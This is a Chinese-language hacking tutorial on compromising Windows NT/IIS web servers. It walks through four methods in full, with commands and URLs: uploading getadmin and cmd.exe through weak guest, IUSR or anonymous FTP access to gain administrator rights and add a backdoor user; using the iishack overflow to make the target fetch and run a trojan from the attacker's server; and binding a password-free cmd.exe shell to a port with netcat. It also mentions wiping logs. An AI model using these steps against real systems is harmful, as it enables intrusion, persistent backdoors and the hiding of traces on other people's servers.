1. 如果你有NT/IIS服務(wù)器的任何一個(gè)帳號(hào)，哪怕是guest帳號(hào)，都可以獲得Administrator權(quán)限；
　　2. 用netcat和iishack可以獲得Administrator；
　　3. iusr_計(jì)算機(jī)名這個(gè)帳號(hào)有ftp上傳、web執(zhí)行等權(quán)限；
　　4. 在web server上執(zhí)行程序是入侵NT的關(guān)鍵；
　　5. 要在web server上執(zhí)行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執(zhí)行權(quán)限的目錄上去。
　　在本文中，目標(biāo)機(jī)器的名稱(chēng)是ntsvr2，目標(biāo)機(jī)器的域名是www.xxx.com，目標(biāo)機(jī)器上有scripts和cgi-bin目錄，scripts目錄下有uploadn.asp等asp程序，可能有g(shù)uest帳號(hào)，肯定有iusr_ntsvr2這個(gè)帳號(hào)。

　　第一個(gè)方法：用iusr_ntsvr2或者guest這兩個(gè)帳號(hào)(這里假設(shè)我們已經(jīng)破解了這個(gè)帳號(hào)的密碼)，在瀏覽器輸入：
　http://www.xxx.com/scripts/uploadn.asp
　　guest和iusr_ntsvr2這兩個(gè)帳號(hào)都可以進(jìn)這個(gè)asp頁(yè)面。
　　在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄，然后輸入：
　http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
　　大約十多秒后屏幕顯示：
　　CGI Error
　　這時(shí)有90%的可能是你已經(jīng)把IUSR_ntsvr2升級(jí)為Administrator，也就是任何訪(fǎng)問(wèn)該web站的人都是管理員。
　　下面可以add user:
　http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

　　這樣就創(chuàng)建了一個(gè)叫china用戶(hù)，密碼是news，然后：
　http://www.xxx.com/scripts/getadmin.exe?china
　　第二個(gè)方法：用匿名ftp
　　如果允許匿名帳號(hào)ftp登陸的設(shè)定，也給我們帶來(lái)了突破NT server的機(jī)會(huì)。我們用ftp登陸一個(gè)NT
server，比如:www.xxx.com(示例名)：
　　c:\> ftp www.xxx.com
　　Connected to www.xxx.com
　　220 ntsvr2 Microsoft FTP Service (Version 3.0).
　　ntsvr2這個(gè)東西暴露了其N(xiāo)ETbios名，那么在IIS的背景下，必然會(huì)有一個(gè)IUSR_ntsvr2的用戶(hù)帳號(hào)，屬于Domain
user組，這個(gè)帳號(hào)我們以后要用來(lái)獲取Administrator的權(quán)限。
　　User (www.xxx.com:(none)):anonymous
　　331 Anonymous access allowed, send identity (e-mail name) as password.
　　Password: 輸入guest@ 或者guest
　　對(duì)于缺乏網(wǎng)絡(luò)安全知識(shí)的管理員來(lái)說(shuō)，很多人沒(méi)有將guest帳號(hào)禁止，或者沒(méi)有設(shè)置密碼，那么guest帳號(hào)就是一個(gè)可用的正確的用戶(hù)帳號(hào)，雖然只屬于Domain
guest組，在這種情況下我們就可以進(jìn)NT server的ftp了。
　　進(jìn)去以后，看看目錄列表，試試cd /scripts或cgi-bin等關(guān)鍵目錄，如果運(yùn)氣好，改變目錄成功，這時(shí)你就有了80%的把握了。
　　把winnt下的cmd.exe copy到cgi-bin，把getadmin和gasys.dll傳上去到cgi-bin，然后輸入：
　http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
　　大約十多秒后屏幕顯示:
　　CGI Error
　　這時(shí)有90%的可能是你已經(jīng)把IUSR_ntsvr2升級(jí)為Administrator，也就是任何訪(fǎng)問(wèn)該web站的人都是管理員。
　　下面可以add user：
　http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

　　這樣就創(chuàng)建了一個(gè)叫china用戶(hù)，密碼是news，然后：
　http://www.xxx.com/cgi-bin/getadmin.exe?china
　　或者
　http://www.xxx.com/scripts/tools/getadmin.exe?china
　　你再用china的帳號(hào)登陸，就可以有最大的權(quán)限了，也可以用上面的cmd.exe的方法直接修改。如果沒(méi)有cmd.exe，也可以自己傳一個(gè)上去到scripts/tools或者cgi-bin目錄下。

　　第三個(gè)方法：用netcat和iishack
　　如果你熟悉使用Netcat這個(gè)工具，你就知道netcat可以利用NT的弱點(diǎn)在其上綁定端口,下面用的eEye工具已經(jīng)介紹過(guò)，如果你熟悉Netcat，成功的可能性會(huì)更大。

　
　　IIS的ISAPI的毛病(*.HTR)：我們?cè)賮?lái)看看eEye最近這兩天發(fā)現(xiàn)的一個(gè)關(guān)于NT/IIS的問(wèn)題和工具。在IIS的/Inetsrv目錄下，有個(gè)DLL文件叫ism.dll，這個(gè)模塊在web運(yùn)行的時(shí)候就被加載到較高的內(nèi)存地址，并且導(dǎo)致了零字節(jié)問(wèn)題到處出現(xiàn)。IIShack.asm，利用這個(gè)毛病，eEye寫(xiě)了兩個(gè)程序： iishack.exe、ncx99.exe，為達(dá)目的你必須自己有一個(gè)web server，把ncx99.exe和netbus木馬傳到這個(gè)web
server的目錄下，比如你的web server是www.mysvr.com，而對(duì)方的IIS server是www.xxx.com，則：
　　iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意：不要加“http://”字符！)
　　上述命令輸入后這時(shí)你應(yīng)該可以看到：
　　------(IIS 4.0 remote buffer overflow exploit)-----------------
　　(c) dark spyrit -- barns@eeye.com.
　http://www.eEye.com
　　[usage: iishack 〈host〉 〈port〉 〈url〉]
　　eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
　　do not include http://' before hosts!
　　---------------------------------------------------------------
　　Data sent!
　　然后：再把Netbus等特洛伊木馬傳到對(duì)方機(jī)器上去：
　　iishack www.example.com 80 www.myserver.com/netbus.exe
　　ncx99.exe實(shí)際上是有名的Netcat的變種，它把對(duì)方server的cmd.exe綁定到Telnet服務(wù)，ncx.exe這是較早的版本，是把端口綁到80的，由于80端口跑web服務(wù)，端口已經(jīng)被使用，所以可能不一定有效。然后，用Telnet到對(duì)方的99或80端口：

　　Telnet www.xxx.com 99

　　結(jié)果是這樣:
　　Microsoft(R) Windows NT(TM)
　　(C) Copyright 1985-1996 Microsoft Corp.
　　C:\>[You have full access to the system, happy browsing :)]
　　C:\>[Add a scheduled task to restart inetinfo in X minutes]
　　C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
　　C:\>[Clean up any trace or logs we might have left behind.]
　　這樣，你就完全控制了其硬盤(pán)上的文件！注意，如果你type exit退出，對(duì)方server上的這個(gè)進(jìn)程也會(huì)退出。
　　參考資料: eeye.zip
　　補(bǔ)救方法:在IIS的www service屬性中將主目錄的應(yīng)用程序設(shè)置的*.htr的映射刪除。
　　第四個(gè)方法：如果你具有一個(gè)目錄的上傳權(quán)限，且這個(gè)目錄具有執(zhí)行的許可，那么恭喜你，你可以Telnet到這臺(tái)server了!
　　下面是具體步驟：
　　假設(shè)你的目錄是www.xxx.com/frankie，那么，把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個(gè)目錄上去，然后在瀏覽器端輸入：

　http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe

　　這時(shí)候你的瀏覽器將停止不動(dòng)，實(shí)際上server上的Telnet的服務(wù)已經(jīng)產(chǎn)生了。
　　這時(shí)，用Telnet連接www.xxx.com的23端口，你發(fā)現(xiàn)會(huì)不用密碼、不用登陸，對(duì)方“C:\”提示符已經(jīng)出現(xiàn)在你的眼前！更妙的是，這個(gè)Telnet server是一個(gè)一次性的服務(wù)，當(dāng)客戶(hù)端一退出，該服務(wù)也將終止。
　　Netcat不同于一般的特洛伊木馬，它可以構(gòu)建任何的TCP連接服務(wù)，在瀏覽器端輸入上述的字符串，等價(jià)于在NT的dos方式下輸入“nc -l -p 23 -t -e cmd.exe”，這將把cmd.exe綁定到23端口上。